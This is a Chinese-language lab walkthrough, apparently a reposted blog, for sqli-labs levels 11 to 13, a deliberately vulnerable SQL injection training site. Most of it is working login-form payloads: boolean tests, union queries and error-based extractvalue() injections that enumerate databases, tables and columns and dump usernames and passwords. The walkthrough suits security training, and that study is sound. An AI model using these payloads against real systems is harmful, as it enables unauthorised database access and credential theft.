sqli-labs(11-20)
2021/10/2 19:10:45
本文主要是介绍sqli-labs(11-20),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
less-11
本关还可以使用union联合查询注入和盲注
(1)使用burpsuite抓包,修改参数构造payload。
输入uname=admin' and 1=1--+&passwd=admin&submit=Submit
可以登录
(2)输入uname=admin' and 1=2--+&passwd=admin&submit=Submit
发现无法登录,说明注入有效,存在报错型注入,接下来又是重复性的工作,上extractvalue()
(3)爆库
uname=admin' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)))--+&passwd=admin&submit=Submit //通过不断改变limit x,1中x的值就可以爆出数据库中所以的库
(4)查看当前数据库
uname=admin' and extractvalue(1,concat(0x7e,(select database())))--+&passwd=admin&submit=Submit
(5)爆表
uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)))--+&passwd=admin&submit=Submit
(6)爆列
uname=admin' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)))--+&passwd=admin&submit=Submit
(7)爆数据
uname=admin' and extractvalue(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1)))--+&passwd=admin&submit=Submit
less-12
1、union联合查询注入
和less-11差不多,改一下闭合方式即可。使用双引号和括号进行闭合
uname=0") union select database(),user()--+&passwd=admin&submit=Submit
2、报错注入
报错注入和less-11不太一样。查看源码
(1)可以看到sql查询语句语句:@sql="SELECT username,password FROM users WHERE username=($uname) and password=($password) LIMIT 0,1";构造一个能闭合语句而且会报错的payload:admin" and extractvalue(1,concat(0x7e,(select database()))) and "
(2)最终admin="admin" and extractvalue(1,concat(0x7e,(select database()))) and " "
传入后就变成了:@sql="SELECT username,password FROM users WHERE username="admin" and extractvalue(1,concat(0x7e,(select database()))) and " " and password=($passwd) LIMIT 0,1";
前闭合,中间查询,后面报错,应该是没有问题的这样可以回显:uname=admin" and " &passwd=123456&submit=Submit
(3)使用extractvalue进行报错注入。
uname=admin" and extractvalue(1,concat(0x7e,database())) and " &passwd=123456&submit=Submit
后面老一套就不再重复了
less-13
登录之后发现没有回显信息,所以union联合注入行不通了,只能通过报错注入和盲注
1、报错注入
uname=admin') and extractvalue(1,concat(0x7e,database())) and ('&passwd=123456&submit=Submit
后面过程和前面一样
less-14
这篇关于sqli-labs(11-20)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23Springboot应用的多环境打包入门
- 2024-11-23Springboot应用的生产发布入门教程
- 2024-11-23Python编程入门指南
- 2024-11-23Java创业入门:从零开始的编程之旅
- 2024-11-23Java创业入门:新手必读的Java编程与创业指南
- 2024-11-23Java对接阿里云智能语音服务入门详解
- 2024-11-23Java对接阿里云智能语音服务入门教程
- 2024-11-23JAVA对接阿里云智能语音服务入门教程
- 2024-11-23Java副业入门:初学者的简单教程
- 2024-11-23JAVA副业入门:初学者的实战指南
